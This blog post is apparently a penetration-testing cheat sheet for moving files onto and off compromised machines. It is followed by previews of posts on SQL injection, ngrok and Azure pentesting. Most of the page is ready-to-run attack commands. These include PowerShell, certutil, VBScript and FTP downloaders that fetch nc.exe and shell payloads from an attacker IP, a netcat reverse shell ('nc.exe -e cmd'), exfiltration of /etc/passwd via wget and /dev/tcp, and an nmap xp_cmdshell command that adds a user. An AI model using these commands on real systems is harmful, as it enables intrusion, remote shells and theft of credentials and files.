Skip to main content

File Transfer Cheat Sheet

By 



Download And Execute a file using Powershell:

on Kali:
python -m SimpleHTTPServer 8001

on Target:
powershell Invoke-WebRequest -Uri 10.10.14.35:8001/nc.exe -OutFile C:\Users\Administrator\downloads\nc.exe

On Kali:
nc -nvlp 9001

On Target:
C:\users\administrator\downloads\nc.exe -e cmd 10.10.14.35 9001 
Sending a file from Victim to Attacker using WGET (Not tested)

wget --post-file=/etc/passwd ATTACKER_IP:8001 

nc -nvlp 9001
Send a File From Kali To Victim

nc -nlvp 9001 < exploit.c  --> Transfer files from Kali 

nc YourIpAddress 8001 > /tmp/exploit.c  --> Get the file On Target Machine
Get a File From Victim to Kali

on Kali: nc -l -p 8001 > filefoldername

on victim: nc -w 5 10.10.14.14 8001 < /usr/local/bin/filename 
Downloading a file with just Bash


#paste the below command in the terminal
function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-


#download a file using below command
__curl http://10.10.10.10:9001/shell.py > shell.py
Downloading a file using Cert Util:

certutil.exe -urlcache -split -f "http://$IP/Powerless.bat" Powerless.bat
Downloading a file without any tool on Target :

on Kali:
nc -nvlp 9001 > backup.7z

on Target:
cat file.7z > /dev/tcp/10.10.14.37/9001

10.10.14.37 --> Kali IP address
Downloading a file using SCP:

scp username@10.10.10.119 file.7z . 

scp -i id_rsa root@10.10.10.10:/root/pass.txt .

scp -P2222 username@website.com:filename .
File Transfer to FreeBSD using Fetch:

on Kali:python -m SimpleHTTPServer 80

On FreeBSD:
/usr/bin/fetch -o 26368.c http://KALI_IP/26368.c 
Download a File using Power Shell:

powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.14.19:8001/41015.exe', 'shell.exe')
File Transfer using VBScript: This acts like wget/curl

Target Machine (Windows):

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

To Download a file:
cscript wget.vbs http://10.10.10.10/nc.exe nc.exe

OR

powershell -ExecutionPolicy Bypass -File wget.ps1 http://10.10.10.10/nc.exe nc.exe

File Transfer using TFTP:

mkdir /share

atftpd --daemon --port 69 /share

cp /usr/share/windows-binaries/nc.exe /share/     //Copy nc.exe to share folder 

On Target Machine:
tftp -i 10.11.0.5 get nc.exe


Non-Interactive File Transfer using FTP --> Script

On Kali:
apt-get update && apt-get install pure-ftpd

Script:

#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

chmod 755 setup-ftp
./setup-ftp                     //need to setup a password


On Target Machine:              //Downloading nc.exe using ftp

echo open 10.11.0.5 21> ftp.txt
echo USER offsec>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt


Downloading Files on Target machine(Powershell Script):

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.10.10/nc.exe" >>wget.ps1
echo $file = "nc.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

Execution:

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Download a File Using nc.exe:

Receive a File
nc –lvp 8001 > file.txt

nc HOST_IP 8001 

Send A File
nc.exe –l -p 4444 < file.txt  

nc.exe -w 1 127.0.0.1 4444 > file.txt
Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Host and Application locally and access it over the internet via ngrock

By
 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Post a Comment
Read more

Cloud Pentest Cheatsheet - Azure

By
Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are: Azure Active Directory (AAD) Azure Resource Manager (ARM) Office 365 (O365) Initial Access Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.  Entra ID Directory Role Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID. Types of Roles: Built-in Directory Roles Global Administrator Application Administrator User Administrator Custom Directory Roles Accessing APIs in Azure Entra ID - Access via Microsoft Graph API Endpoint {HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters} Azure Resource Manager API Endpoint (ARM-specific) {HTTP method} https://management.azure.com/{...
Post a Comment
Read more